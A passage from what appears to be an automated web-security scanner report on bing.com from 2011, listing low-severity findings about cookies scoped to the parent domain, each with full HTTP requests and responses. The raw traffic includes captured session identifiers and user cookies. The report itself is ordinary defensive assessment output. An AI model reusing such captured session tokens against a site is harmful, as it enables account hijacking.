Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/las-vegas-nevada-trips-1003502
Date: Fri, 11 Feb 2011 21:46:19 GMT
Connection: close
Set-Cookie: lbc=18; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z7s38rpfkercl2yz74rb2hu9cnuco_VID-z1n8ppi7nv5f10yz79ofvl7lheql4_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:19 GMT; Path=/travel
Set-Cookie: JSESSIONID=B5BCC216FD00F37E72162E209E5DC133; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460779; domain=.bing.com; path=/
Set-Cookie: _SS=SID=998AC92DF8DE4176A8D10B5E59C5D155; domain=.bing.com; path=/


2.5. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/orlando-florida-hotels-hostels-motels-1004643 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/orlando-florida-trips-1004643
Date: Fri, 11 Feb 2011 21:46:20 GMT
Connection: close
Set-Cookie: lbc=914; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gavb6tgt9cj3yz537ou28tfef9i_VID-3hj6nr643agpayz6dbfcgvh3fvaj_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:20 GMT; Path=/travel
Set-Cookie: JSESSIONID=E95235E963A2DF8E29889E5BBD935FF3; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:20 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460780; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8C47D5A8725040C1BB26FE4119092907; domain=.bing.com; path=/


2.6. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:49 GMT
Content-Length: 27957
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:49 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D112E558C1254059A8053EF8937619A6; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

2.7. http://www.bing.com/browse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /browse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F3588EE7150F4A06A38A556D2979D3C1; domain=.bing.com; path=/
Content-Length: 39120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

2.8. http://www.bing.com/events/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:48 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=48D2324963F04E158870DD7D33820F4D; domain=.bing.com; path=/
Content-Length: 68849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

2.9. http://www.bing.com/images/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /images/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/images
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=62FB203ABE6B4340BB2B5B957921B4A1; domain=.bing.com; path=/
Content-Length: 61264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

2.10. http://www.bing.com/local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _HOP=; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.bing.com:80/local/
X-BM-TraceID: c2fe4ba620f6480b9d5cb06a42abadfc
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _HOP=I=1&TS=1297463871; domain=.bing.com; path=/
Content-Length: 146

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bing.com:80/local/">here</a>.</h2>
</body></html>

2.11. http://www.bing.com/local/ypdefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/ypdefault.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 23:45:17 GMT
Last-Modified: Fri, 11 Feb 2011 21:45:17 GMT
X-BM-TraceID: 5c0f1f0c56bc48fb8aa37c02cfb76fa8
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=105e87fa5505430dba31d5b25b248b42; path=/local
Set-Cookie: CID=84ab2256db4b4410ac7cbfab5b9a7934; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/11/2011 9:45:17 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:17 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=63F5F83330384CD78E309DFEE65F3927; domain=.bing.com; path=/
Content-Length: 55438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...

2.12. http://www.bing.com/maps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 1a0e5b1d2d614a5a8935caa2c2a373d3
X-Ve-Server: BL2-01206-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Date: Fri, 11 Feb 2011 21:44:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:28 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8E0811106C0646379A276C208363964B; domain=.bing.com; path=/
Content-Length: 116852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

2.13. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: c821dd5956474cc8a14cb3f28f6175f4
X-Ve-Server: BL2-01212-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Date: Fri, 11 Feb 2011 21:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:50 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C6FB3C601612431EA0824421BAC3CD04; domain=.bing.com; path=/
Content-Length: 116900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

2.14. http://www.bing.com/maps/explore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01208
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:13 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=ECF2B380802E49969DD2EADFA4502597; domain=.bing.com; path=/
Content-Length: 43179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...

2.15. http://www.bing.com/news/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=29DA2FA1DA7F4552877E610D60E8B949; domain=.bing.com; path=/


2.16. http://www.bing.com/news/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5112D7B54309486995D17B4B2D97CE76; domain=.bing.com; path=/


2.17. http://www.bing.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /results.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:50 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1297460630; domain=.bing.com; path=/


2.18. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:47 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:47 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460807; domain=.bing.com; path=/
Set-Cookie: _SS=SID=39C40F774DB04C78BCC469B988D1944B; domain=.bing.com; path=/
Content-Length: 0


2.19. http://www.bing.com/settings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /settings.aspx?pref_sbmt=1&ru=http%3A%2F%2Fwww.bing.com%3A80%2Flocal%2F&adlt_set=demote&geoname=Washington%2C+District+Of+Columbia&geonamedef=Washington%2C+District+Of+Columbia&setplang=NO_OP&rpp=10&enAS=1&langall=1&sl=37&GUID=DC63BAA44C3843F38378B4BB213E0A6F&uid=3874D123 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com:80/local/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 23:28:20 GMT
Connection: close
Set-Cookie: SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; expires=Sun, 10-Feb-2013 23:28:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297466900; domain=.bing.com; path=/


2.20. http://www.bing.com/shopping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping

Issue detail

